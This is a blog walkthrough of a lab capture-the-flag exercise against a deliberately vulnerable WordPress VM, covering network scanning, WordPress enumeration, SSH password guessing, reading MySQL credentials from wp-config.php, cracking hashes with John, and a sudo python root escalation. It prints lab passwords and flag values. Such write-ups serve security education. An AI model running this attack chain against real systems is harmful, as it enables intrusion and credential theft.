This project began with getting access to a virtual machine running on Azure. The virtual host contained a hypervisor that managed 5 virtual machines:
- Kali Linux – used for pen testing
- Elk Server – for alerts and monitoring
- Capstone – exploited in a previous project, used to test alerts in the ELK server
- Target1 – the machine to be targeted here
- Target2 – coming soon….
The following describes the steps taken to enumerate the target machine, scan for vulnerabilities, gain access to user accounts and finally escalate privileges and capture all of the flags.
Scan the network to identify the IP address of the target machine (Target1)
Using ‘netdiscover’ I can see the different IPs available within the Azure Virtual Network
Trying these IP addresses in a browser reveals the Target1 machine as 192.168.1.110
Document all exposed ports and services
$ nmap -sV -p- 192.168.1.110
nmap shows the following open ports
This shows that ports 80 (http via apache) and 22 (ssh) are open
Clicking on the links in the nav shows a blog with the URL: 192.168.1.110/wordpress
Enumerate the WordPress site.
$ wpscan --url 192.168.1.110/wordpress --enumerate vp,u
This will scan WordPress for vulnerable plugins and users
The result shows the following users:
Use SSH to gain a user shell
$ssh [email protected]
Guessed the password as ‘michael’ and gained a shell
Since the machine is running the site on apache I navigated to the /var/www directory
In this directory, there is a file called flag2.txt
flag2:fc3fd58dcdad9ab23faca6e9a36e581c
Then I navigated to the /var/www/html directory
I did a search for any flags in the directory and found flag1 hidden in a comment tag in the service.html file
flag1:b9bbcb33e11b80be759c4e844862482d
Find the MySQL database password.
Since WordPress sites have configuration data saved in files on the file system decided to take a look at /var/www/html/wordpress/wp-config.php
Found the mysql login information
Use the credentials to log into MySQL and dump WordPress user password hashes.
In order to see the contents of the database logged into mysql with the following
$mysql -u root -p
entered password ‘R@v3nSecurity’
mysql> use wordpress
mysql> show tables;
Took a look in the wp_users table
mysql> SELECT * FROM wp_users;
Can see hashed passwords for Michael and Steven
Crack password hashes with John
Created a file wp_hashes.txt with the usernames and passwords found in the Worpress users database table
$john wp_hashes.txt
Steven’s password is ‘pink84’
Then I logged into the WordPress admin UI with steven:pink84
Navigated to Posts and see and unpublished draft called ‘flag3’
flag3:afc01ab56b50591e7dccf93122770cd2
Secure a user shell as the user whose password you cracked.
$ssh [email protected]
password: pink84
ran
$sudo -l
to see what the user would be able to run as sudo
This reveals that Steven can run python commands as root withouth a password
Did a google search to see if there is a python command that can escalate privleges to root
$sudo python -c 'import pty;pty.spawn("/bin/bash")'
Looked in the root directory
flag4:715dea6c055b9fe3337544932f2941ce
Result: All 4 flags
- flag1:b9bbcb33e11b80be759c4e844862482d
- flag2:fc3fd58dcdad9ab23faca6e9a36e581c
- flag3:afc01ab56b50591e7dccf93122770cd2
- flag4:715dea6c055b9fe3337544932f2941ce
In the next post, I will go over steps a site admin can take to harden the Raven Security server against future attacks and also create an ansible playbook that can be used to harden other servers with similar vulnerabilities.
One thought on “Raven Security – Pen Test Example and Walkthrough”
Comments are closed.